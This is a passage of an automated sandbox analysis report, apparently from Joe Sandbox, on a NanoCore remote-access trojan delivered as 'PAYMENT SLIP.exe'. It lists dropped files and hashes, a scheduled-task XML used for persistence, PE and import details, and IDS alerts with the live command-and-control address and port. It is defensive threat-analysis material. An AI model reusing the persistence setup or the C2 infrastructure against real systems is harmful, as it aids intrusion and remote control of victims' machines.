            Category:dropped
            Size (bytes):227087
            Entropy (8bit):7.939223952673508
            Encrypted:false
            SSDEEP:6144:J7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1T:qOnSY3A807r8AZFz1UN
            MD5:DC0CB7051E536384DE28ED52AB92EA19
            SHA1:D145293DEE4F6A963FE964B44CB791F599265B52
            SHA-256:7180220E08967228A453E1076EFDEB42589456E4CB6F1D5C8F5765F1994A179C
            SHA-512:DD189821102FE517D24541F9D34C77F4210802B7B3FD089D0AA28090DFF719676325A8F886209B3CEE48AEA6149A67A4EC4C3C97E252EA7336F9E8EF4E36CD5E
            Malicious:false
            C:\Users\user\AppData\Local\Temp\nshD279.tmp\qm1tw12xr.dll
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):3.7496483038392974
            Encrypted:false
            SSDEEP:48:Sa/T+kBvwunRLZ6AL0rpRVaS53RS9BNZYWrTZxZ4Vo:+kBvFLgALER8S53RS9dtng
            MD5:EE2F349BA112FE569BD9AB1368E65791
            SHA1:9CEB495D81A804E604111D98C1169B4A9B640510
            SHA-256:5A97B6F5313D875AE40429BB27D486F7B745EEFDF5C116E434DC08770923FA9F
            SHA-512:D4CD1A797307B4FC4D9C3E80979BDDE682F64931FCF6D9CFCAE333646A242C143C2F77D2D6A80E01452A614E7981339E7E17580871B48518DC71A58339970B64
            Malicious:false
            C:\Users\user\AppData\Local\Temp\nsiFB00.tmp\qm1tw12xr.dll
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):3.7496483038392974
            Encrypted:false
            SSDEEP:48:Sa/T+kBvwunRLZ6AL0rpRVaS53RS9BNZYWrTZxZ4Vo:+kBvFLgALER8S53RS9dtng
            MD5:EE2F349BA112FE569BD9AB1368E65791
            SHA1:9CEB495D81A804E604111D98C1169B4A9B640510
            SHA-256:5A97B6F5313D875AE40429BB27D486F7B745EEFDF5C116E434DC08770923FA9F
            SHA-512:D4CD1A797307B4FC4D9C3E80979BDDE682F64931FCF6D9CFCAE333646A242C143C2F77D2D6A80E01452A614E7981339E7E17580871B48518DC71A58339970B64
            Malicious:false
            C:\Users\user\AppData\Local\Temp\nsj3D87.tmp\qm1tw12xr.dll
            Process:C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):3.7496483038392974
            Encrypted:false
            SSDEEP:48:Sa/T+kBvwunRLZ6AL0rpRVaS53RS9BNZYWrTZxZ4Vo:+kBvFLgALER8S53RS9dtng
            MD5:EE2F349BA112FE569BD9AB1368E65791
            SHA1:9CEB495D81A804E604111D98C1169B4A9B640510
            SHA-256:5A97B6F5313D875AE40429BB27D486F7B745EEFDF5C116E434DC08770923FA9F
            SHA-512:D4CD1A797307B4FC4D9C3E80979BDDE682F64931FCF6D9CFCAE333646A242C143C2F77D2D6A80E01452A614E7981339E7E17580871B48518DC71A58339970B64
            Malicious:false
            C:\Users\user\AppData\Local\Temp\nsj62B2.tmp
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:data
            Category:dropped
            Size (bytes):227087
            Entropy (8bit):7.939223952673508
            Encrypted:false
            SSDEEP:6144:J7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1T:qOnSY3A807r8AZFz1UN
            MD5:DC0CB7051E536384DE28ED52AB92EA19
            SHA1:D145293DEE4F6A963FE964B44CB791F599265B52
            SHA-256:7180220E08967228A453E1076EFDEB42589456E4CB6F1D5C8F5765F1994A179C
            SHA-512:DD189821102FE517D24541F9D34C77F4210802B7B3FD089D0AA28090DFF719676325A8F886209B3CEE48AEA6149A67A4EC4C3C97E252EA7336F9E8EF4E36CD5E
            Malicious:false
            C:\Users\user\AppData\Local\Temp\nsmD249.tmp
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:data
            Category:dropped
            Size (bytes):227087
            Entropy (8bit):7.939223952673508
            Encrypted:false
            SSDEEP:6144:J7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1T:qOnSY3A807r8AZFz1UN
            MD5:DC0CB7051E536384DE28ED52AB92EA19
            SHA1:D145293DEE4F6A963FE964B44CB791F599265B52
            SHA-256:7180220E08967228A453E1076EFDEB42589456E4CB6F1D5C8F5765F1994A179C
            SHA-512:DD189821102FE517D24541F9D34C77F4210802B7B3FD089D0AA28090DFF719676325A8F886209B3CEE48AEA6149A67A4EC4C3C97E252EA7336F9E8EF4E36CD5E
            Malicious:false
            C:\Users\user\AppData\Local\Temp\nsnFAD0.tmp
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:data
            Category:dropped
            Size (bytes):227087
            Entropy (8bit):7.939223952673508
            Encrypted:false
            SSDEEP:6144:J7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1T:qOnSY3A807r8AZFz1UN
            MD5:DC0CB7051E536384DE28ED52AB92EA19
            SHA1:D145293DEE4F6A963FE964B44CB791F599265B52
            SHA-256:7180220E08967228A453E1076EFDEB42589456E4CB6F1D5C8F5765F1994A179C
            SHA-512:DD189821102FE517D24541F9D34C77F4210802B7B3FD089D0AA28090DFF719676325A8F886209B3CEE48AEA6149A67A4EC4C3C97E252EA7336F9E8EF4E36CD5E
            Malicious:false
            C:\Users\user\AppData\Local\Temp\nsq1C23.tmp
            Process:C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            File Type:data
            Category:dropped
            Size (bytes):227087
            Entropy (8bit):7.939223952673508
            Encrypted:false
            SSDEEP:6144:J7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1T:qOnSY3A807r8AZFz1UN
            MD5:DC0CB7051E536384DE28ED52AB92EA19
            SHA1:D145293DEE4F6A963FE964B44CB791F599265B52
            SHA-256:7180220E08967228A453E1076EFDEB42589456E4CB6F1D5C8F5765F1994A179C
            SHA-512:DD189821102FE517D24541F9D34C77F4210802B7B3FD089D0AA28090DFF719676325A8F886209B3CEE48AEA6149A67A4EC4C3C97E252EA7336F9E8EF4E36CD5E
            Malicious:false
            C:\Users\user\AppData\Local\Temp\nsy2D8A.tmp\qm1tw12xr.dll
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):3.7496483038392974
            Encrypted:false
            SSDEEP:48:Sa/T+kBvwunRLZ6AL0rpRVaS53RS9BNZYWrTZxZ4Vo:+kBvFLgALER8S53RS9dtng
            MD5:EE2F349BA112FE569BD9AB1368E65791
            SHA1:9CEB495D81A804E604111D98C1169B4A9B640510
            SHA-256:5A97B6F5313D875AE40429BB27D486F7B745EEFDF5C116E434DC08770923FA9F
            SHA-512:D4CD1A797307B4FC4D9C3E80979BDDE682F64931FCF6D9CFCAE333646A242C143C2F77D2D6A80E01452A614E7981339E7E17580871B48518DC71A58339970B64
            Malicious:false
            C:\Users\user\AppData\Local\Temp\nsz3D48.tmp
            Process:C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            File Type:data
            Category:dropped
            Size (bytes):227087
            Entropy (8bit):7.939223952673508
            Encrypted:false
            SSDEEP:6144:J7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1T:qOnSY3A807r8AZFz1UN
            MD5:DC0CB7051E536384DE28ED52AB92EA19
            SHA1:D145293DEE4F6A963FE964B44CB791F599265B52
            SHA-256:7180220E08967228A453E1076EFDEB42589456E4CB6F1D5C8F5765F1994A179C
            SHA-512:DD189821102FE517D24541F9D34C77F4210802B7B3FD089D0AA28090DFF719676325A8F886209B3CEE48AEA6149A67A4EC4C3C97E252EA7336F9E8EF4E36CD5E
            Malicious:false
            C:\Users\user\AppData\Local\Temp\nsz6311.tmp\qm1tw12xr.dll
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):3.7496483038392974
            Encrypted:false
            SSDEEP:48:Sa/T+kBvwunRLZ6AL0rpRVaS53RS9BNZYWrTZxZ4Vo:+kBvFLgALER8S53RS9dtng
            MD5:EE2F349BA112FE569BD9AB1368E65791
            SHA1:9CEB495D81A804E604111D98C1169B4A9B640510
            SHA-256:5A97B6F5313D875AE40429BB27D486F7B745EEFDF5C116E434DC08770923FA9F
            SHA-512:D4CD1A797307B4FC4D9C3E80979BDDE682F64931FCF6D9CFCAE333646A242C143C2F77D2D6A80E01452A614E7981339E7E17580871B48518DC71A58339970B64
            Malicious:false
            C:\Users\user\AppData\Local\Temp\p7nih0ok4yeyw5j9l
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:data
            Category:dropped
            Size (bytes):9733
            Entropy (8bit):7.976610510872038
            Encrypted:false
            SSDEEP:192:ttSk8it38myV0RlyqF61GDX8uuU078l07Ie73nOblxXLz7gUZW3E:/+UMmlzdjsv7CMz3ALzUl0
            MD5:B312481DDB4D93F427F4BFE952EC032F
            SHA1:A035A4ABF6D941F61F1427791B0121A4B400DB20
            SHA-256:E49684274A30B245C813044704EC5E9F4EB63163B6F0D18A969F5EC455240A2E
            SHA-512:E7697534D567B978BF4AD8AB015B3EA0CD39DC9A7EBF0DC77AF01075B797696895A8A4D5D52F834EC60DB877230353C99A7CD732AF023120079F1D3A889F513C
            Malicious:false
            C:\Users\user\AppData\Local\Temp\tmp3E70.tmp
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1320
            Entropy (8bit):5.136963558289723
            Encrypted:false
            SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mnc2xtn:cbk4oL600QydbQxIYODOLedq3ZLj
            MD5:AE766004C0D8792953BAFFFE8F6A2E3B
            SHA1:14B12F27543A401E2FE0AF8052E116CAB0032426
            SHA-256:1ABDD9B6A6B84E4BA1AF1282DC84CE276C59BA253F4C4AF05FEA498A4FD99540
            SHA-512:E530DA4A5D4336FC37838D0E93B5EB3804B9C489C71F6954A47FC81A4C655BB72EC493E109CF96E6E3617D7623AC80697AD3BBD5FFC6281BAFC8B34DCA5E6567
            Malicious:true
            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
            C:\Users\user\AppData\Local\Temp\yj86kat5ru4v3qtvudmb
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:data
            Category:dropped
            Size (bytes):207872
            Entropy (8bit):7.998917498661265
            Encrypted:true
            SSDEEP:6144:j7IDzCvnAXYv/i/8bA7r8ePZFz1Yxp1TN:cOnSY3A807r8AZFz1UNN
            MD5:C9F8BAE9DBB880A3C8D3100855E94065
            SHA1:2F66D8691CD7E33C7F5026DD7DB102FAFD664C7B
            SHA-256:913B0E52C651B9BE1F4FA52EFCBC9FBE6471B805A9AD27D8DDC6FB5286D330E6
            SHA-512:797E0D7E5D502332A049816F1AAE2C17060698C11432C0639079D0F16C7C2DB3F9B3A9F07A101729723C621A8A3D96972A164768126990A73FF0D01DC255EA6C
            Malicious:false
            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            File Type:data
            Category:dropped
            Size (bytes):1856
            Entropy (8bit):7.089541637477408
            Encrypted:false
            SSDEEP:48:IknjhUknjhUknjhUknjhUknjhUknjhUknjhUknjhL:HjhDjhDjhDjhDjhDjhDjhDjhL
            MD5:30D23CC577A89146961915B57F408623
            SHA1:9B5709D6081D8E0A570511E6E0AAE96FA041964F
            SHA-256:E2130A72E55193D402B5F43F7F3584ECF6B423F8EC4B1B1B69AD693C7E0E5A9E
            SHA-512:2D5C5747FD04F8326C2CC1FB313925070BC01D3352AFA6C36C167B72757A15F58B6263D96BD606338DA055812E69DDB628A6E18D64DD59697C2F42D1C58CC687
            Malicious:false
            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            File Type:International EBCDIC text, with NEL line terminators
            Category:dropped
            Size (bytes):8
            Entropy (8bit):3.0
            Encrypted:false
            SSDEEP:3:bAt:U
            MD5:C2A50EDC6F6D3A2C5183544FFC6B36FE
            SHA1:41213577BDE2E7AD795F79D2747EA7B4FEBE44B7
            SHA-256:1105EDFF279035C252F149FAD0058E533177E1C4CD1525278187C168572D8A9B
            SHA-512:01C57FEEAE764B4541AF6078BFDB3C2C4599DC2E2063279507AA84B7C0DB11771E504A6437A8848B0EF30AB8BA3D2A10A4E06C4354DF8184BD8C6156E1413FCC
            Malicious:true
            Preview: \N..K..H
            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):57
            Entropy (8bit):4.85263908467479
            Encrypted:false
            SSDEEP:3:oMty8WbSI1u:oMLWuI1u
            MD5:A35128E4E28B27328F70E4E8FF482443
            SHA1:B89066B2F8DB34299AABFD7ABEE402D5444DD079
            SHA-256:88AEA00733DC4B570A29D56A423CC5BF163E5ACE7AF349972EB0BBA8D9AD06E1
            SHA-512:F098E844B5373B34642B49B6E0F2E15CFDAA1A8B6CABC2196CEC0F3765289E5B1FD4AB588DD65F97C8E51FA9A81077621E9A06946859F296904C646906A70F33
            Malicious:false
            Preview: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
            Category:dropped
            Size (bytes):259286
            Entropy (8bit):7.914777825531565
            Encrypted:false
            SSDEEP:6144:kgORaiLT/dr9odWD2AHR5onxnn/UHDV8m0RjPwCytV:kgmLT/vodYR5gnn/i0RjPjc
            MD5:50C9D58F61950484825D85A9A1372A7D
            SHA1:79DF49A23AF28B6322F1FA461167B1145FC927DE
            SHA-256:80726D3E380E4A7D0D1EEE7F352C4A319E70DD4355A1A4F02AB27BABC1A13D15
            SHA-512:AC470694F9CA70CF8EB1A87604AE03E9F521FA413AA2D78F411AF4B7F60BC8CF346C2C69F30E083AA6F34E32041012F295DCF6BDAD378E1A2A8CD6D2E9FC066D
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 43%
            \Device\ConDrv
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):235
            Entropy (8bit):5.107306146099542
            Encrypted:false
            SSDEEP:6:zx3M1tlAX8bSWR30qysGMQbSVRRZBXVRbJ0fFPRAgRYan:zK1XnV30ZsGMIG9BFRbQ5AUYan
            MD5:67DDD8252A246E7B14649B0063E351C0
            SHA1:AAE1C6839D1CC4A626D0FB2D4773823AD209FA17
            SHA-256:24C8283BA3F7FCA2E4CEF6F141263DD1E8A36E5A5CD96A97BFE83525D7663116
            SHA-512:326A5E0A440F60D4808C91499F1F3616C496B67DC053B4A2A40B0FE09002074AE5365018781F8746E98E7E3CFCD35F1310D17FB7C2138A8157318E6791987025
            Malicious:false
            Preview: Microsoft (R) Build Engine Version 2.0.50727.8922..[Microsoft .NET Framework, Version 2.0.50727.8922]..Copyright (C) Microsoft Corporation 2005. All rights reserved.....MSBUILD : error MSB1009: Project file does not exist...Switch: 0..

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
            Entropy (8bit):7.914777825531565
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:PAYMENT SLIP.exe
            File size:259286
            MD5:50c9d58f61950484825d85a9a1372a7d
            SHA1:79df49a23af28b6322f1fa461167b1145fc927de
            SHA256:80726d3e380e4a7d0d1eee7f352c4a319e70dd4355a1a4f02ab27babc1a13d15
            SHA512:ac470694f9ca70cf8eb1a87604ae03e9f521fa413aa2d78f411af4b7f60bc8cf346c2c69f30e083aa6f34e32041012f295dcf6bdad378e1a2a8cd6d2e9fc066d
            SSDEEP:6144:kgORaiLT/dr9odWD2AHR5onxnn/UHDV8m0RjPwCytV:kgmLT/vodYR5gnn/i0RjPjc
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................f...*.....

            File Icon

            Icon Hash:b2a88c96b2ca6a72

            Static PE Info

            General

            Entrypoint:0x4035d8
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x5F24D702 [Sat Aug 1 02:44:18 2020 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:c05041e01f84e1ccca9c4451f3b6a383

            Entrypoint Preview

            Instruction
            sub esp, 000002D4h
            push ebx
            push esi
            push edi
            push 00000020h
            pop edi
            xor ebx, ebx
            push 00008001h
            mov dword ptr [esp+14h], ebx
            mov dword ptr [esp+10h], 0040A230h
            mov dword ptr [esp+1Ch], ebx
            call dword ptr [004080C8h]
            call dword ptr [004080CCh]
            and eax, BFFFFFFFh
            cmp ax, 00000006h
            mov dword ptr [0042A26Ch], eax
            je 00007FBFD4F753F3h
            push ebx
            call 00007FBFD4F786F9h
            cmp eax, ebx
            je 00007FBFD4F753E9h
            push 00000C00h
            call eax
            mov esi, 004082B0h
            push esi
            call 00007FBFD4F78673h
            push esi
            call dword ptr [00408154h]
            lea esi, dword ptr [esi+eax+01h]
            cmp byte ptr [esi], 00000000h
            jne 00007FBFD4F753CCh
            push 0000000Bh
            call 00007FBFD4F786CCh
            push 00000009h
            call 00007FBFD4F786C5h
            push 00000007h
            mov dword ptr [0042A264h], eax
            call 00007FBFD4F786B9h
            cmp eax, ebx
            je 00007FBFD4F753F1h
            push 0000001Eh
            call eax
            test eax, eax
            je 00007FBFD4F753E9h
            or byte ptr [0042A26Fh], 00000040h
            push ebp
            call dword ptr [00408038h]
            push ebx
            call dword ptr [00408298h]
            mov dword ptr [0042A338h], eax
            push ebx
            lea eax, dword ptr [esp+34h]
            push 000002B4h
            push eax
            push ebx
            push 00421708h
            call dword ptr [0040818Ch]
            push 0040A384h

            Rich Headers

            Programming Language:
            • [EXP] VC++ 6.0 SP5 build 8804

            Data Directories

            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b000 | 0xa50 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

            Sections

            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x1000 | 0x6572 | 0x6600 | False | 0.662300857843 | data | 6.45391938596 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .rdata | 0x8000 | 0x1398 | 0x1400 | False | 0.449609375 | data | 5.13671758274 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data | 0xa000 | 0x20378 | 0x600 | False | 0.5078125 | data | 4.09680908363 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .ndata | 0x2b000 | 0x10000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .rsrc | 0x3b000 | 0xa50 | 0xc00 | False | 0.402994791667 | data | 4.18988587465 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

            Resources

            Name | RVA | Size | Type | Language | Country
            RT_ICON | 0x3b190 | 0x2e8 | data | English | United States
            RT_DIALOG | 0x3b478 | 0x100 | data | English | United States
            RT_DIALOG | 0x3b578 | 0x11c | data | English | United States
            RT_DIALOG | 0x3b698 | 0x60 | data | English | United States
            RT_GROUP_ICON | 0x3b6f8 | 0x14 | data | English | United States
            RT_MANIFEST | 0x3b710 | 0x340 | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

            Imports

            DLL | Import
            ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
            SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
            ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
            COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
            USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
            GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
            KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

            Possible Origin

            Language of compilation system | Country where language is spoken | Map
            English | United States |

            Network Behavior

            Snort IDS Alerts

            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
            05/12/21-15:41:34.548350 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49745 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:41:41.843567 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49746 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:41:46.571158 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49747 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:41:51.395995 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49748 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:41:56.069794 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49750 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:42:00.757206 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49755 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:42:05.426115 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49763 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:42:11.653205 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49769 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:42:19.087468 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49770 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:42:25.331297 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49771 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:42:31.561598 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49772 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:42:38.561876 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49773 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:42:44.823846 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49777 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:42:49.508873 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49778 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:42:54.396373 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49779 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:43:02.640724 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49780 | 3030 | 192.168.2.4 | 23.254.130.71
            05/12/21-15:43:07.360825 | TCP | 2025019 | ET TROJAN Possible NanoCore C2 60B | 49781 | 3030 | 192.168.2.4 | 23.254.130.71

            Network Port Distribution

            TCP Packets

            May 12, 2021 15:41:36.350486040 CEST497453030192.168.2.423.254.130.71
            May 12, 2021 15:41:36.350486994 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350512028 CEST30304974523.254.130.71192.168.2.4
            May 12, 2021 15:41:36.350533009 CEST497453030192.168.2.423.254.130.71
